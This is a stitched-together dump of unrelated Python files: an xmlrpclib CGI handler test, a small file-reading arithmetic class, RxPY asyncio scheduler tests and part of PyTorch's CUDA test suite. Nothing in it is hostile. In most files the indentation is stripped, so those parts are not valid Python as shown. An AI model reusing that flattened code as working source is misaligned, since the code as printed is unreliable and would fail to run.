data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
open("xmldata.txt", "w").write(data)
tmp1 = sys.stdin
tmp2 = sys.stdout
sys.stdin = open("xmldata.txt", "r")
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdin.close()
sys.stdout.close()
sys.stdin = tmp1
sys.stdout = tmp2
# the server should respond with a Fault; if so, our goal is achieved ;)
handle = open(test_support.TESTFN, "r").read()
# start at the 44th char to skip the HTTP header; we only need the XML payload
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
os.remove("xmldata.txt")
os.remove(test_support.TESTFN)
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase]
# The test cases against a SimpleXMLRPCServer raise a socket error
# 10035 (WSAEWOULDBLOCK) in the server thread handle_request call when
# run on Windows. This only happens on the first test to run, but it
# fails every time and so these tests are skipped on win32 platforms.
if sys.platform != 'win32':
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
SourceCode.py
|
from Base import BaseClass
import ast
from threading import Thread
import pickle
class SourceCode(BaseClass):
    def add(self):
        with open(self.get_file_path(), 'r') as f:
            input_1 = f.readline().strip()
        with open(self.get_file_path_2(), 'r') as f:
            input_2 = f.readline().strip()
        try:
            input_1 = ast.literal_eval(input_1)
        except (ValueError, SyntaxError):
            pass
        try:
            input_2 = ast.literal_eval(input_2)
        except (ValueError, SyntaxError):
            pass
        print(type(input_1))
        result = input_1 + input_2
        print(result)

    def multiply(self):
        with open(self.get_file_path(), 'r') as f:
            input_1 = f.readline().strip()
        with open(self.get_file_path_2(), 'r') as f:
            input_2 = f.readline().strip()
        try:
            input_1 = ast.literal_eval(input_1)
        except (ValueError, SyntaxError):
            pass
        try:
            input_2 = ast.literal_eval(input_2)
        except (ValueError, SyntaxError):
            pass
        if isinstance(input_2, int) and isinstance(input_1, int):
            print(input_1 * input_2)
        else:
            print('Data Types not compatible or don\'t match')

    def divide(self):
        with open(self.get_file_path(), 'r') as f:
            input_1 = f.readline().strip()
        with open(self.get_file_path_2(), 'r') as f:
            input_2 = f.readline().strip()
        try:
            input_1 = ast.literal_eval(input_1)
        except (ValueError, SyntaxError):
            pass
        try:
            input_2 = ast.literal_eval(input_2)
        except (ValueError, SyntaxError):
            pass
        if isinstance(input_2, int) and isinstance(input_1, int) and input_2 != 0:
            print(input_1 // input_2)
        else:
            print('Data Types not compatible, don\'t match, or divisor is zero')


obj = SourceCode()
thread_1 = Thread(target=obj.multiply)
thread_1.start()
thread_1.join()
with open('saved_objects.txt', 'wb') as objects:
    pickle.dump(f'{thread_1.__dict__}', objects)
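# The three methods above repeat the same parse-with-fallback idiom. A minimal
# sketch of that idiom as a standalone helper (hypothetical; not used by the
# class above):
def _parse_literal(text):
    """Return the Python literal encoded in ``text``, or ``text`` unchanged
    if it is not a valid literal (e.g. a bare word)."""
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return text
# e.g. _parse_literal('42') -> 42, _parse_literal('hello') -> 'hello'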
|
py3_asyncioscheduler.py
|
from nose import SkipTest
import rx
import asyncio
import threading
import unittest
from datetime import datetime, timedelta
from rx.concurrency import AsyncIOScheduler
class TestAsyncIOScheduler(unittest.TestCase):
def test_asyncio_schedule_now(self):
loop = asyncio.get_event_loop()
scheduler = AsyncIOScheduler(loop)
res = scheduler.now - datetime.now()
assert(res < timedelta(seconds=1))
def test_asyncio_schedule_action(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
scheduler.schedule(action)
yield from asyncio.sleep(0.1, loop=loop)
assert(ran is True)
loop.run_until_complete(go())
def test_asyncio_schedule_action_threadsafe(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop, threadsafe=True)
ran = False
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
scheduler.schedule(action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1, loop=loop)
assert(ran is True)
loop.run_until_complete(go())
def test_asyncio_schedule_action_due(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
scheduler.schedule_relative(200, action)
yield from asyncio.sleep(0.3, loop=loop)
diff = endtime-starttime
assert(diff > 0.18)
loop.run_until_complete(go())
def test_asyncio_schedule_action_due_threadsafe(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
scheduler = AsyncIOScheduler(loop, threadsafe=True)
starttime = loop.time()
endtime = None
def action(scheduler, state):
nonlocal endtime
endtime = loop.time()
def schedule():
scheduler.schedule_relative(200, action)
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.3, loop=loop)
diff = endtime-starttime
assert(diff > 0.18)
loop.run_until_complete(go())
def test_asyncio_schedule_action_cancel(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOScheduler(loop)
def action(scheduler, state):
nonlocal ran
ran = True
d = scheduler.schedule_relative(10, action)
d.dispose()
yield from asyncio.sleep(0.1, loop=loop)
assert(not ran)
loop.run_until_complete(go())
def test_asyncio_schedule_action_cancel_threadsafe(self):
loop = asyncio.get_event_loop()
@asyncio.coroutine
def go():
ran = False
scheduler = AsyncIOScheduler(loop, threadsafe=True)
def action(scheduler, state):
nonlocal ran
ran = True
def schedule():
d = scheduler.schedule_relative(10, action)
d.dispose()
threading.Thread(target=schedule).start()
yield from asyncio.sleep(0.1, loop=loop)
assert(not ran)
loop.run_until_complete(go())
|
test_cuda.py
|
# Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
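# Example (hypothetical, mirroring how the tests use this helper): build a
# 4x5 sparse CUDA tensor holding 3 randomly placed values.
#     make_sparse_tensor(torch.cuda.sparse.FloatTensor, 3, 4, 5)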
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_r >= last_r
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour with no argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour with no argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with an end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will OOM when trying to allocate more than half of the memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
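# A minimal sketch (hypothetical) of the guarantee exercised above: copy_() is
# synchronized on the *current* stream of each device involved, so two copies
# that share the destination's current stream are observed in issue order:
#
#     s = torch.cuda.Stream(device=y.device)
#     with torch.cuda.stream(s):
#         y.copy_(a)      # enqueued on s
#         y.copy_(b)      # also on s, lands after the first copy
#     s.synchronize()     # y now holds b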
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes a 0.1 second spin to the stream so that, if the copy is
# non-blocking, the stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self):
orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
